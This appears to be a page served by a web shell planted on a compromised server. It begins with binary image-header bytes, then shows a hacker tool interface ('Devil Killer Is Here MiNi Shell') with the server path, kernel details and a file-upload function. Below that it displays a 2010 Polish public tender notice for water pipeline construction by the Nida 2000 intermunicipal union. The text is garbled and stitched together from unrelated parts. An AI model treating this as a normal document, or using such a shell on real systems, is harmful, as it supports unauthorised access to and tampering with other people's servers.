JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100809/243668-N-2010.html

<p class="kh_header"><b>Nowy Korczyn: Rozbudowa wodociągu tranzytowego NIDA 2000 
Zadanie II-Sieć tranzytowa Łapszów - Gorzków 
Zadanie IV-Wodociąg tranzytowy do Solca Zdroju</b><br>
<b>Numer ogłoszenia: 243668 - 2010; data zamieszczenia: 09.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Związek Międzygminny "Nida 2000" , Stary Korczyn, 28-136 Nowy Korczyn, woj. świętokrzyskie, tel. 41 3772619, faks 41 3799126.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nida2000.realnet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Związek Międzygminny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa wodociągu tranzytowego NIDA 2000 
Zadanie II-Sieć tranzytowa Łapszów - Gorzków 
Zadanie IV-Wodociąg tranzytowy do Solca Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest budowa sieci tranzytowej Łapszów - Gorzków oraz Budowa wodociągu tranzytowego do Solca Zdroju, Kontrakt I zadanie II i IV  w ramach projektu Rozbudowa wodociągu tranzytowego NIDA 2000. Kontrakt ten jest kontynuacją inwestycji prowadzonej przez Związek Międzygminny Nida 2000, w ramach której wybudowano Stację Uzdatniania Wody w Starym Korczynie oraz wodociąg tranzytowy do m. Siedliska w Gminie Koszyce. Część tranzytu na terenie Gminy Koszyce (Siedliska - Łapszów) jest równolegle realizowana w ramach Projektu Zapewnienie prawidłowej gospodarki wodno - ściekowej na terenie Związków Międzygminnych Nidzica i Nida 2000 przez Beneficjenta PO IiŚ - Związek Międzygminny Nidzica w Kazimierzy Wielkiej. 
Tranzyt Łapszów - Gorzków:
W ramach zadania realizowana będzie sieć wodociągowa 315 PE o długości 5325 m pomiędzy zbiornikami ZB4 i ZB5A  z uwzględnieniem przyłączenia miejscowości: Boronice, Góry Sieradzkie, Sieradzice, Chruszczyna Mała, Chruszczyna Wielka, Łyczaków, Plechówka, Plechów, Wielgus, Nagorzanki, Łąkawa, Marcinkowice, Dalechowice, Paśmiechy, Krzyszkowice, Leksyce, Gorzków, Wojsławice, Donatkowice, Zysławice w gminie Kazimierza Wielka. Średnica wynika z obliczeń hydraulicznych potrzeb zbiorników, pomp i lokalnych sieci. Do rozwiązań technologicznych oraz z uwagi na ukształtowanie terenu, projektuje się ułożenie wodociągu z rur PE. Przejście pod przeszkodami z siecią wodociągową w stalowych rurach ochronnych metodą przekopu i przewiertu. Rury osłonowe na sieciach. Trasę wodociągu zaprojektowano w dostosowaniu do istniejącej zabudowy, granic i dróg. Wszystkie elementy metalowe wodociągu kładzione w gruncie będą zabezpieczone antykorozyjnie specjalnymi taśmami, powłokami.
W zakresie przedmiotu zamówienia jest również Zbiornik ZB5A.  Zaprojektowano zbiornik o pojemności Vcał.= 2 x 150 m3 = 300 m3  jako dwukomorowy, stalowy, ocieplany wykonany ze stali kwasoodpornej. Zbiornik będzie posiadał wyposażenie technologiczne, instalację do sterowania napełnień i wyposażenie elektryczne. Zbiornik wyposażony będzie w rurociągi: przelewowy, spustowy, przelewowy i poboru. 
Zbiornik jako rozwiązanie typowe posiadał będzie następujące dane charakterystyczne:
- dwie komory zbiornika			2 x 150 m3 
- pojemność każdej z komór 			150 m 3 
- średnica zbiornika 			D = 4500 mm
- wysokość zbiornika 			Hz = 9500 mm
- wysokość całkowita zbiornika 		Hc = 11200 mm
- ciężar					G = 6640 kG
- rurociąg dopływowy			Dd = 250 mm
- rurociąg odpływowy			Do = 200 mm
- rurociąg przelewowy			Dp = 300 mm
- rurociąg spustowy			Ds. = 100 mm
Każda z komór zbiornika wykonana ze stali nierdzewnej (kwasowej) w postaci walca wraz z izolacją ocieplającą. Zbiornik posadowiony będzie na płycie żelbetowej o rzucie kołowym D = 5,06 m. W płycie wyprofilowana będzie wnęka dla umożliwienia podejść rurociągami do zbiornika. Zbiornik wyposażony w niezbędne instalacje tzn. drabinkę zewnętrzną, drabinkę wewnętrzną, instalacje sterownicze, sygnalizacyjne (zbiornik pusty, zbiornik pełny, sygnalizacja awaryjna przy dłuższym zadziałaniu przelewu awaryjnego zbiornika świadczącym o uszkodzeniu zaworu pływakowego) i technologiczne (zawór pływakowy zamykający dopływ wody na poziomie Hmax zbiornika).   
Wodociąg tranzytowy do Solca Zdroju:
Przedmiotem inwestycji jest budowa sieci wodociągowej tranzytowej na odcinku Nowy Korczyn - Solec-Zdrój. Wodociąg zasilany będzie z istniejącej magistrali wodociągowej PE 315 doprowadzonej na teren ujęcia wody w Nowym Korczynie. 
Projektowany wodociąg zlokalizowany będzie na działkach prywatnych i gminnych, a także w pasach drogowych dróg gminnych, powiatowych i wojewódzkich. Działki prywatne użytkowane są rolniczo oraz występują zadrzewienia i zakrzaczenia. Część działek jest odłogowanych. Jezdnie dróg są utwardzone kamieniem lub o nawierzchni bitumicznej.
W zakresie istniejącego uzbrojenia terenu na trasach projektowanej sieci wodociągowej występuje sieć elektroenergetyczna, teletechniczna, kanalizacyjna i gazowa.
Zestawienie sieci wodociągowej :
Teren gminy Nowy Korczyn:
długość sieci wodociągowej 225 PE 6483,5 m
liczba przyłączy 1 szt.
długość łączna przyłączy O 63 PE 5,0 m
Teren gminy Solec-Zdrój:
długość sieci wodociągowej 225 PE 4350,0 m
długość sieci wodociągowej 90 PE 6,0 m
liczba przyłączy 1 szt.
długość łączna przyłączy O 40 PE 10,5 m
Hydranty p.poż. nadziemne Dn80 2 szt.
Zawór napowietrzająco-odpowietrzający Dn80 1 szt. Projektowana sieć wodociągowa obejmować będzie swym zasięgiem miejscowości Nowy Korczyn, Grotniki Duże, Grotniki Małe, Górnowolę, Zagórzany i Solec-Zdrój. Sieć wodociągową zaprojektowano z rur PE100+ PN10 SDR17 dwuściennych do wody pitnej z dodatkową zewnętrzną warstwą ochronną grubości min. 3 mm odporną na ścieranie oraz zewnętrzne uszkodzenia z wtopioną wkładką metaliczną posiadające  certyfikat jakości ISO 9001.Część sieci prowadzona jest w pasie drogowym. Przejścia poprzeczne wykonane będą metodą przewiertu.  W celu zapewnienia możliwości czasowego wyłączenia odcinka sieci z eksploatacji (np. usunięcie awarii) bez konieczności zrzutu wody z całej sieci tranzytowej, zaprojektowano wykonanie 6 szt. Węzłów przelotowych w komorach betonowych wykonanych z kręgów O1200 mm oraz poprzez hydranty naziemne p.poż.
Uzbrojenie sieci wodociągowej:
-zasuwy klinowe kołnierzowe z miękkim uszczelnieniem klina, wyposażone w obudowy i skrzynki uliczne,
-hydranty nadziemne  O 80, PN 10 nierdzewne. 
Zaprojektowane na trasie wodociągu przyłącza z rur i kształtek polietylenowych PE 100 PN 10 SDR17 dwuścienne do wody pitnej z dodatkową zewnętrzną warstwą ochronną odporną na ścieranie oraz zewnętrzne uszkodzenia z wtopioną wkładką metaliczną o średnicach O 40/3,7 mm i O 63/5,8 mm
Studzienek wodomierzowych - szt. 1 śr 1,2 m.
Zaprojektowano komorę wodomierzową na działce nr 302 w Zagórzanach należącej do gminy Solec Zdrój. 
Projektuje się komorę żelbetową o wymiarach wewnętrznych 3,10m x 1,40m głębokości 2,0m wyniesioną 20cm nad teren. Komora wyposażona będzie w 2 włazy f 80cm oraz 2 rury wywiewne f 110PVC. Wewnątrz komory przewiduje się zamontowanie wodomierza sprzężonego typu MWN/JS 100/2,5-S, zaworu antyskażeniowego oraz 2 zasuwy. Wszystkie przejścia rurociągów przez ściany komory wykonywane będą jako przejścia szczelne w tulejach PE..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość wystąpienia zamówień uzupełniających zgodnie z art. 67.1.6 w wysokości 50% wartości zamówienia podstawowego. W trakcie reazliacji zamówienia podstawowego może wystąpić konieczność zrealizowania robót nie objętych zamówieniem, bez których realizacja zadania podstawowego nie będzie możliwa do zrealizowania.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.50-8, 45.33.20.00-3, 45.23.21.51-5, 45.23.21.52-2, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości 200 000 PLN (słownie: dwieście tysięcy złotych). Wadium może być wnoszone w jednej lub kilku następujących formach: 
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr 42, poz. 275).
Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego: Związek Międzygminny NIDA 2000 Stary Korczyn; 28-136 Nowy Korczyn;   NBS Solec Zdrój 73 85170007 0000 0003 1482 0001</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz nie podlegać wykluczeniu na podstawie art. 24 u.p.z.p. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
b)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
c)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
d)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać niezbędną wiedzę i doświadczenie do wykonania niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będą ich łączne kwalifikacje i doświadczenie):
- wykonać w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a w przypadku, gdy okres działalności jest krótszy:
co najmniej jedno zamówienie na roboty budowlane obejmujące budowę, przebudowę lub remont sieci wodociągowej o długości co najmniej 10 km.
W celu potwierdzenia spełniania warunków określonych powyżej Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót budowlanych (jeden wspólny wykaz w przypadku Wykonawców składających ofertę wspólną), sporządzony według sporządzonego wzoru.
Do wykazu należy dołączyć dokumenty potwierdzające, że zamówienia zostały wykonane należycie. Zaleca się, aby przedkładane dokumenty zawierały:
-	wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu, zrealizował zamówienie, którego dokument dotyczy;
-	wskazanie podmiotu, na rzecz którego zamówienie zostało zrealizowane oraz jego opinię stwierdzającą, że zamówienie zostało wykonane należycie, podpisaną przez upoważnionego przedstawiciela;
-	wskazanie wartości zrealizowanej inwestycji;
-	wskazanie daty wykonania (rozpoczęcia i ukończenia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować potencjałem technicznym pozwalającym na prawidłowe wykonanie zamówienia. W tym celu Wykonawca złoży oświadczenie zgodnie ze sporządzonym wzorem. ((w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
a)	wskazać do uczestniczenia w wykonaniu zamówienia osoby, stanowiące podstawowy personel kierowniczy i techniczny (zwanych też kluczowymi specjalistami), wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności: 
-Kierownik budowy - zobowiązany jest posiadać: uprawnienia do kierowana robotami budowlanymi w zakresie sieci, instalacji i urządzeń wodociągowych, cieplnych wentylacyjnych i gazowych zgodnie z art.12,art.12a ust.1 ora art.14 ust.1 ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz.U.z 2006r,nr 156, poz.1118 ze.zm.)(lub równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów), wymagane jest doświadczenie w robotach budowlanych w zakresie sieci wodociągowej o długości min. 10 km jako kierownik budowy
-Kierownik robót elektrycznych - ma posiadać uprawnienia do kierowania robotami w specjalności instalacyjno-inżynieryjnej w zakresie instalacji elektrycznych
-Kierownik robót drogowych - ma posiadać uprawnienia do kierowania robotami w specjalności drogowej
Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r., nr 156, poz. 1118 ze zm.) oraz aktualnie obowiązującym Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., Nr 83, poz. 578). Osoby, które posiadają uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo budowlane, uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie, przedkładają te dokumenty.W celu potwierdzenia spełniania powyższych warunków Wykonawca zobowiązany jest przedłożyć: wykaz osób, które będzie dysponował przy wykonywaniu niniejszego zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia sporządzony według sporządzonego wzoru a także dołączyć oświadczenie Wykonawcy , że osoby będące uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. (Wykonawcy składający ofertę wspólną winni złożyć jeden wspólny wykaz).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. W szczególności Wykonawca musi spełniać łącznie następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa):
a)	Posiadać średni roczny przychód netto ze sprzedaży w ostatnich trzech latach obrotowych (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) w wysokości co najmniej 5 000 000 PLN;
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy (ten lub ci z Wykonawców, którzy w imieniu Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia będą potwierdzać spełnienie tego warunku) zobowiązani są przedłożyć sprawozdanie finansowe, a w przypadku Wykonawców niezobowiązanych do sporządzenia sprawozdania finansowego - inne dokumenty określające obroty oraz zobowiązania i należności- za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. Przedłożone dokumenty wskazane w poprzednim zdaniu muszą potwierdzać uzyskanie przez Wykonawcę wymaganych powyżej przychodów z tytułu sprzedaży. 
Informacje, o których mowa powyżej muszą być również przedstawione w formie streszczenia, sporządzonego na podstawie sporządzonego wzoru.
b)	Posiadać środki finansowe lub zdolność kredytową w wysokości co najmniej 2 000 000 PLN;
W celu potwierdzenia posiadania środków finansowych lub zdolności kredytowej w wymaganej kwocie, Wykonawcy (ten lub ci z Wykonawców, którzy w imieniu Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia będą potwierdzać spełnienie tego warunku) zobowiązani są przedłożyć informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, potwierdzającą wysokość posiadanych środków finansowych lub posiadanie przez Wykonawcę zdolności kredytowej w wymaganej wysokości.
c)	Posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 2 000 000,00 PLN;
W celu potwierdzenia niniejszego warunku Wykonawcy (ten lub ci z Wykonawców, którzy w imieniu Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia będą potwierdzać spełnienie tego warunku) zobowiązani są przedłożyć polisę, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

